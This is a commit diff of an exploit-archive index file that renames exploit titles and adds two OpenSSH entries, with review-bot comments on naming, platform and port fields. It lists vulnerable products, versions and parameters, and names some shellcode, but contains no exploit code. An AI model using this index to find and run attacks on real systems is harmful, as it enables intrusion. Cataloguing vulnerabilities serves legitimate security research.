DB: 2016-12-24

3 new exploits

WinFTP Server 2.0.2 - (PASV) Remote Denial of Service
WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service
WinFTP Server 2.3.0 - (NLST) Denial of Service
WinFTP Server 2.3.0 - 'NLST' Denial of Service
vxFtpSrv 2.0.3 - CWD command Remote Buffer Overflow (PoC)
vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation
X7 Chat 2.0.5 - lib/message.php preg_replace() PHP Code Execution (Metasploit)
X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading
X7 Chat 2.0 - (help_file) Remote Command Execution
X7 Chat 2.0 - 'help_file' Parameter Remote Command Execution
Ultimate WebBoard 3.00 - (Category) SQL Injection
PromoteWeb MySQL - 'go.php id' SQL Injection
212Cafe Board 0.07 - (view.php qID) SQL Injection
Ultimate WebBoard 3.00 - 'Category' Parameter SQL Injection
PromoteWeb MySQL - 'id' Parameter SQL Injection
212Cafe Board 0.07 - 'qID' Parameter SQL Injection
The Gemini Portal - 'lang' Remote File Inclusion
RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection
ASPapp KnowledgeBase - 'catid' SQL Injection
The Gemini Portal 4.7 - 'lang' Parameter Remote File Inclusion
RPG.Board 0.0.8Beta2 - 'showtopic' Parameter SQL Injection
ASPapp KnowledgeBase - 'catid' Parameter SQL Injection
X7 Chat 2.0.1A1 - (mini.php help_file) Local File Inclusion
X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion
CoAST 0.95 - (sections_file) Remote File Inclusion
Real Estate Manager - 'cat_id' SQL Injection
LnBlog 0.9.0 - (plugin) Local File Inclusion
PlugSpace 0.1 - (index.php navi) Local File Inclusion
MyCard 1.0.2 - (gallery.php id) SQL Injection
PowerPortal 2.0.13 - 'path' Local Directory Traversal
PHP-Lance 1.52 - (show.php catid) SQL Injection
Yoxel 1.23beta - (itpm_estimate.php a) Remote Code Execution
CoAST 0.95 - 'sections_file' Parameter Remote File Inclusion
Real Estate Manager 1.01 - 'cat_id' Parameter SQL Injection
LnBlog 0.9.0 - 'plugin' Parameter Local File Inclusion
PlugSpace 0.1 - 'navi' Parameter Local File Inclusion
MyCard 1.0.2 - 'id' Parameter SQL Injection
PowerPortal 2.0.13 - 'path' Parameter Local Directory Traversal
PHP-Lance 1.52 - 'catid' Parameter SQL Injection
Yoxel 1.23beta - 'itpm_estimate.php' Remote Code Execution
ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection
ZEELYRICS 2.0 - 'bannerclick.php' SQL Injection
Pro Chat Rooms 3.0.3 - (guid) SQL Injection
Pilot Group eTraining - 'news_read.php id' SQL Injection
BbZL.php 0.92 - (lien_2) Local Directory Traversal
Pro Chat Rooms 3.0.3 - SQL Injection
Pilot Group eTraining - 'news_read.php' SQL Injection
BbZL.php 0.92 - 'lien_2' Parameter Local Directory Traversal
Arcadem Pro - 'articlecat' SQL Injection
Arcadem Pro - 'articlecat' Parameter SQL Injection
ArabCMS - 'rss.php rss' Local File Inclusion
FAQ Management Script - 'catid' SQL Injection
ArabCMS - 'rss.php' Local File Inclusion
FAQ Management Script - 'catid' Parameter SQL Injection
BookMarks Favourites Script - 'view_group.php id' SQL Injection
BookMarks Favourites Script - 'id' Parameter SQL Injection
BMForum 5.6 - (tagname) SQL Injection
BMForum 5.6 - 'tagname' Parameter SQL Injection
Crux Gallery 1.32 - (index.php theme) Local File Inclusion
phpScheduleIt 1.2.10 - (reserve.php) Remote Code Execution
RPortal 1.1 - (file_op) Remote File Inclusion
Crux Gallery 1.32 - 'theme' Parameter Local File Inclusion
phpScheduleIt 1.2.10 - 'reserve.php' Remote Code Execution
RPortal 1.1 - 'file_op' Parameter Remote File Inclusion
Link Trader - 'ratelink.php lnkid' SQL Injection
Link Trader - 'lnkid' Parameter SQL Injection
OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion
OpenX 2.6 - (ac.php bannerid) Blind SQL Injection
OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion
OpenX 2.6 - 'bannerid' Parameter Blind SQL Injection
X7 Chat 2.0.5 - (Authentication Bypass) SQL Injection
X7 Chat 2.0.5 - Authentication Bypass
Arcadem Pro 2.8 - (article) Blind SQL Injection
Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection
Link Trader - (lnkid) SQL Injection
phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection (Metasploit)
phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)
PowerPortal 1.1/1.3 - modules.php Traversal Arbitrary Directory Listing
PowerPortal 1.1/1.3 - 'modules.php' Traversal Arbitrary Directory Listing
Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion
Atomic Photo Album 0.x/1.0 - 'Apa_PHPInclude.INC.php' Remote File Inclusion
BMForum 3.0 - topic.php Multiple Parameter Cross-Site Scripting
BMForum 3.0 - forums.php Multiple Parameter Cross-Site Scripting
BMForum 3.0 - post.php forumid Parameter Cross-Site Scripting
BMForum 3.0 - announcesys.php forumid Parameter Cross-Site Scripting
BMForum 3.0 - 'topic.php' Cross-Site Scripting
BMForum 3.0 - 'forums.php' Cross-Site Scripting
BMForum 3.0 - 'post.php' Cross-Site Scripting
BMForum 3.0 - 'announcesys.php' Cross-Site Scripting
PowerPortal 1.1/1.3 - 'index.php' search Parameter Cross-Site Scripting
PowerPortal 1.1/1.3 - search.php search Parameter Cross-Site Scripting
PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting
PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting
X7 Chat 2.0.4 - sources/frame.php room Parameter Cross-Site Scripting
X7 Chat 2.0.4 - upgradev1.php INSTALL_X7CHATVERSION Parameter Cross-Site Scripting
X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting
X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting
BMForum 5.6 - 'index.php' outpused Parameter Cross-Site Scripting
BMForum 5.6 - newtem/footer/bsd01footer.php Multiple Parameter Cross-Site Scripting
BMForum 5.6 - newtem/header/bsd01header.php Multiple Parameter Cross-Site Scripting
BMForum 5.6 - 'index.php' Cross-Site Scripting
BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting
BMForum 5.6 - 'bsd01header.php' Cross-Site Scripting
Pilot Group eTraining - courses_login.php cat_id Parameter Cross-Site Scripting
Pilot Group eTraining - news_read.php id Parameter Cross-Site Scripting
Pilot Group eTraining - lessons_login.php Multiple Parameter Cross-Site Scripting
Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting
Pilot Group eTraining - 'news_read.php' Cross-Site Scripting
Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting
OpenX - /www/admin/plugin-index.php parent Parameter Cross-Site Scripting
OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting
Apache mod_session_crypto - Padding Oracle
parent 26b1e8b6ad
commit 897e1fa191
6 changed files with 639 additions and 93 deletions

files.csv (114 changes)
@ -443,7 +443,7 @@ id,file,description,date,author,platform,type,port
|
|||
2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control - 'ole32.dll' Denial of Service",2006-12-18,shinnai,windows,dos,0
|
||||
2947,platforms/multiple/dos/2947.pl,"wget 1.10.2 - (Unchecked Boundary Condition) Denial of Service",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0
|
||||
2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption",2006-12-19,"Breno Silva Pinto",multiple,dos,0
|
||||
2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - (PASV) Remote Denial of Service",2006-12-19,shinnai,windows,dos,0
|
||||
2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service",2006-12-19,shinnai,windows,dos,0
|
||||
2954,platforms/linux/dos/2954.html,"KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception Exploit",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0
|
||||
2961,platforms/hardware/dos/2961.py,"Hewlett-Packard (HP) FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0
|
||||
2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 - (ActiveX Control) Denial of Service",2006-12-20,shinnai,windows,dos,0
|
||||
|
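Review bot: the only change in this hunk is the quoting of the command name in the 2952 title ('PASV' for (PASV)), which matches the form used by the other renames in this commit; no objection, but the 2961 context row in the same hunk, "Hewlett-Packard (HP) FTP Print Server 2.4.5 - Buffer Overflow (PoC)", still carries parentheses inside the product name, so a later pass that strips or rewrites parentheses mechanically should leave vendor abbreviations like that alone.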
@ -801,7 +801,7 @@ id,file,description,date,author,platform,type,port
|
|||
6554,platforms/windows/dos/6554.html,"Google Chrome - Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos,0
|
||||
6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)",2008-09-25,securfrog,windows,dos,0
|
||||
6565,platforms/windows/dos/6565.txt,"K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer Denial of Service (PoC)",2008-09-25,Aodrulez,windows,dos,0
|
||||
6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - (NLST) Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0
|
||||
6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - 'NLST' Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0
|
||||
6582,platforms/hardware/dos/6582.pl,"Microsoft Windows Mobile 6.0 - Device long name Remote Reboot Exploit",2008-09-26,"Julien Bedard",hardware,dos,0
|
||||
6588,platforms/windows/dos/6588.txt,"Microsoft Windows - GDI+ '.ico' Remote Division By Zero Exploit",2008-09-26,"laurent gaffié",windows,dos,0
|
||||
6609,platforms/windows/dos/6609.html,"Google Chrome 0.2.149.30 - Window Object Suppressing Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0
|
||||
|
@ -811,7 +811,7 @@ id,file,description,date,author,platform,type,port
|
|||
6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - PoC (MS08-052)",2008-09-28,"John Smith",windows,dos,0
|
||||
6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x - Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0
|
||||
6647,platforms/windows/dos/6647.c,"ESET SysInspector 1.1.1.0 - 'esiadrv.sys' (PoC)",2008-10-01,"NT Internals",windows,dos,0
|
||||
6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - CWD command Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0
|
||||
6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0
|
||||
6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow (PoC)",2008-10-02,securfrog,windows,dos,0
|
||||
6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0
|
||||
6660,platforms/windows/dos/6660.txt,"Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
|
||||
|
@ -8733,6 +8733,7 @@ id,file,description,date,author,platform,type,port
|
|||
40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
|
||||
40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
|
||||
40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
|
||||
40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
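Review bot: the new 40962 row records platform 'linux', yet the title scopes the issue by OpenSSH version ('< 7.4') and by a server setting ('UsePrivilegeSeparation Disabled'), not by operating system; this file already uses 'multiple' for such cases (2947 and 2949 in the first hunk), and the same question applies to the companion 40963 row added further down. Type 'local' with port 0 is consistent with a privilege-escalation entry, and the id ordering after 40957 is correct.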
@ -14517,7 +14518,7 @@ id,file,description,date,author,platform,type,port
|
|||
35170,platforms/hardware/remote/35170.txt,"Lexmark X651de - Printer Ready Message Value HTML Injection",2011-01-06,"dave b",hardware,remote,0
|
||||
35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Execution",2011-01-05,d3c0der,windows,remote,0
|
||||
35180,platforms/bsd/remote/35180.rb,"Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)",2014-11-06,Metasploit,bsd,remote,0
|
||||
35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - lib/message.php preg_replace() PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80
|
||||
35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80
|
||||
35184,platforms/hardware/remote/35184.py,"Belkin n750 - jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080
|
||||
35188,platforms/windows/remote/35188.py,"Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote,0
|
||||
35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0
|
||||
|
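Review bot: the 35183 rename drops both 'lib/' and 'preg_replace()' and keeps only 'message.php'. The preg_replace() mention was the only part of the title that said how PHP code execution is reached, and the other Metasploit rename in this commit (18037) likewise loses its parameter name. If the convention is to keep only the file name, fine, but consider retaining the function that identifies the vector, e.g. "X7 Chat 2.0.5 - 'message.php' preg_replace() PHP Code Execution (Metasploit)", so the row stays searchable by the bug class.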
@ -15192,6 +15193,7 @@ id,file,description,date,author,platform,type,port
|
|||
40920,platforms/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0
|
||||
40930,platforms/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,osx,remote,0
|
||||
40949,platforms/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",cgi,remote,80
|
||||
40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
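Review bot: the new 40963 row is typed 'remote' with port 22, but the title itself describes an agent protocol issue, which is reached through the ssh-agent socket (typically a forwarded one) rather than through the sshd listener; the sibling 40962 row added above for the same OpenSSH release uses port 0. Either document why 22 is the right value (the forwarding path does begin with an SSH session) or use 0, so that port-based searches do not present this as an exploit against the sshd service itself.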
@ -16171,7 +16173,7 @@ id,file,description,date,author,platform,type,port
|
|||
1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote File Inclusion",2006-04-30,Aesthetico,php,webapps,0
|
||||
1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - 'lostpw.php' Remote File Inclusion",2006-04-30,cijfer,php,webapps,0
|
||||
1733,platforms/php/webapps/1733.pl,"Invision Power Board 2.1.5 - (from_contact) SQL Injection",2006-05-01,"Ykstortion Security",php,webapps,0
|
||||
1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0
|
||||
1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Parameter Remote Command Execution",2006-05-02,rgod,php,webapps,0
|
||||
1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3 / 2.3.8 - (show.php) Remote File Inclusion",2006-05-02,R@1D3N,php,webapps,0
|
||||
1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion",2006-05-03,webDEViL,php,webapps,0
|
||||
1747,platforms/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0
|
||||
|
@ -19544,69 +19546,69 @@ id,file,description,date,author,platform,type,port
|
|||
6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - 'FCKeditor' Arbitrary File Upload",2008-09-25,Stack,php,webapps,0
|
||||
6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection",2008-09-26,Stack,php,webapps,0
|
||||
6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - 'class_dir' Parameter Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0
|
||||
6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
|
||||
6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'go.php id' SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
|
||||
6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - (view.php qID) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
|
||||
6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - 'Category' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
|
||||
6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'id' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
|
||||
6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - 'qID' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
|
||||
6579,platforms/php/webapps/6579.txt,"Libra PHP File Manager 1.18 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0
|
||||
6580,platforms/php/webapps/6580.txt,"Atomic Photo Album 1.1.0pre4 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0
|
||||
6583,platforms/php/webapps/6583.txt,"Esqlanelapse Software Project 2.6.2 - Insecure Cookie Handling",2008-09-26,ZoRLu,php,webapps,0
|
||||
6584,platforms/php/webapps/6584.txt,"The Gemini Portal 4.7 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0
|
||||
6585,platforms/php/webapps/6585.txt,"openEngine 2.0 beta2 - Remote File Inclusion",2008-09-26,Crackers_Child,php,webapps,0
|
||||
6586,platforms/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0
|
||||
6587,platforms/php/webapps/6587.txt,"The Gemini Portal - 'lang' Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0
|
||||
6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection",2008-09-26,0x90,php,webapps,0
|
||||
6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' SQL Injection",2008-09-27,Crackers_Child,php,webapps,0
|
||||
6587,platforms/php/webapps/6587.txt,"The Gemini Portal 4.7 - 'lang' Parameter Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0
|
||||
6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' Parameter SQL Injection",2008-09-26,0x90,php,webapps,0
|
||||
6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' Parameter SQL Injection",2008-09-27,Crackers_Child,php,webapps,0
|
||||
6591,platforms/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0
|
||||
6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - (mini.php help_file) Local File Inclusion",2008-09-27,NoGe,php,webapps,0
|
||||
6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion",2008-09-27,NoGe,php,webapps,0
|
||||
6593,platforms/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - SQL Injection",2008-09-27,elusiven,php,webapps,0
|
||||
6594,platforms/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload",2008-09-27,Mi4night,php,webapps,0
|
||||
6595,platforms/php/webapps/6595.txt,"Joovili 3.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps,0
|
||||
6596,platforms/php/webapps/6596.txt,"E-Uploader Pro 1.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps,0
|
||||
6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - (sections_file) Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0
|
||||
6599,platforms/php/webapps/6599.txt,"Real Estate Manager - 'cat_id' SQL Injection",2008-09-27,CraCkEr,php,webapps,0
|
||||
6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - (plugin) Local File Inclusion",2008-09-27,dun,php,webapps,0
|
||||
6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - (index.php navi) Local File Inclusion",2008-09-27,dun,php,webapps,0
|
||||
6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - (gallery.php id) SQL Injection",2008-09-27,r45c4l,php,webapps,0
|
||||
6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0
|
||||
6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - (show.php catid) SQL Injection",2008-09-27,InjEctOr5,php,webapps,0
|
||||
6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - (itpm_estimate.php a) Remote Code Execution",2008-09-27,dun,php,webapps,0
|
||||
6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - 'sections_file' Parameter Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0
|
||||
6599,platforms/php/webapps/6599.txt,"Real Estate Manager 1.01 - 'cat_id' Parameter SQL Injection",2008-09-27,CraCkEr,php,webapps,0
|
||||
6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - 'plugin' Parameter Local File Inclusion",2008-09-27,dun,php,webapps,0
|
||||
6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - 'navi' Parameter Local File Inclusion",2008-09-27,dun,php,webapps,0
|
||||
6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - 'id' Parameter SQL Injection",2008-09-27,r45c4l,php,webapps,0
|
||||
6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Parameter Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0
|
||||
6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - 'catid' Parameter SQL Injection",2008-09-27,InjEctOr5,php,webapps,0
|
||||
6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - 'itpm_estimate.php' Remote Code Execution",2008-09-27,dun,php,webapps,0
|
||||
6607,platforms/php/webapps/6607.txt,"X7 Chat 2.0.1A1 - Local File Inclusion",2008-09-27,JIKO,php,webapps,0
|
||||
6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection",2008-09-28,"Hussin X",php,webapps,0
|
||||
6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - 'bannerclick.php' SQL Injection",2008-09-28,"Hussin X",php,webapps,0
|
||||
6610,platforms/asp/webapps/6610.txt,"ParsaWeb CMS - 'Search' SQL Injection",2008-09-28,BugReport.IR,asp,webapps,0
|
||||
6611,platforms/php/webapps/6611.php,"PHPcounter 1.3.2 - 'index.php' SQL Injection",2008-09-28,StAkeR,php,webapps,0
|
||||
6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - (guid) SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0
|
||||
6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php id' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0
|
||||
6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - (lien_2) Local Directory Traversal",2008-09-28,JIKO,php,webapps,0
|
||||
6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0
|
||||
6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0
|
||||
6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - 'lien_2' Parameter Local Directory Traversal",2008-09-28,JIKO,php,webapps,0
|
||||
6618,platforms/php/webapps/6618.txt,"Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps,0
|
||||
6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - 'linkid' Parameter SQL Injection",2008-09-28,boom3rang,php,webapps,0
|
||||
6621,platforms/php/webapps/6621.txt,"BbZL.php 0.92 - Insecure Cookie Handling",2008-09-28,Stack,php,webapps,0
|
||||
6623,platforms/php/webapps/6623.txt,"events Calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",php,webapps,0
|
||||
6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' SQL Injection",2008-09-29,"Hussin X",php,webapps,0
|
||||
6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' Parameter SQL Injection",2008-09-29,"Hussin X",php,webapps,0
|
||||
6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 - Insecure Cookie Handling",2008-09-29,Crackers_Child,php,webapps,0
|
||||
6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script - Multiple SQL Injections",2008-09-29,"Super Cristal",php,webapps,0
|
||||
6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php rss' Local File Inclusion",2008-09-29,JIKO,php,webapps,0
|
||||
6629,platforms/php/webapps/6629.txt,"FAQ Management Script - 'catid' SQL Injection",2008-09-30,"Hussin X",php,webapps,0
|
||||
6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php' Local File Inclusion",2008-09-29,JIKO,php,webapps,0
|
||||
6629,platforms/php/webapps/6629.txt,"FAQ Management Script - 'catid' Parameter SQL Injection",2008-09-30,"Hussin X",php,webapps,0
|
||||
6631,platforms/php/webapps/6631.txt,"SG Real Estate Portal 2.0 - Blind SQL Injection / Local File Inclusion",2008-09-30,SirGod,php,webapps,0
|
||||
6632,platforms/php/webapps/6632.txt,"MiNBank 1.5.0 - Multiple Remote File Inclusion",2008-09-30,DaRkLiFe,php,webapps,0
|
||||
6633,platforms/php/webapps/6633.txt,"eFront 3.5.1 / build 2710 - Arbitrary File Upload",2008-09-30,Pepelux,php,webapps,0
|
||||
6634,platforms/php/webapps/6634.php,"SG Real Estate Portal 2.0 - Blind SQL Injection",2008-09-30,Stack,php,webapps,0
|
||||
6635,platforms/php/webapps/6635.txt,"SG Real Estate Portal 2.0 - Insecure Cookie Handling",2008-09-30,Stack,php,webapps,0
|
||||
6636,platforms/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 - Blind SQL Injection",2008-09-30,ka0x,php,webapps,0
|
||||
6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - 'view_group.php id' SQL Injection",2008-09-30,"Hussin X",php,webapps,0
|
||||
6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - 'id' Parameter SQL Injection",2008-09-30,"Hussin X",php,webapps,0
|
||||
6639,platforms/php/webapps/6639.txt,"Pritlog 0.4 - 'Filename' Remote File Disclosure",2008-09-30,Pepelux,php,webapps,0
|
||||
6640,platforms/php/webapps/6640.pl,"ADN Forum 1.0b - Blind SQL Injection",2008-10-01,StAkeR,php,webapps,0
|
||||
6641,platforms/php/webapps/6641.txt,"MySQL Quick Admin 1.5.5 - 'cookie' Local File Inclusion",2008-10-01,JosS,php,webapps,0
|
||||
6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - (tagname) SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0
|
||||
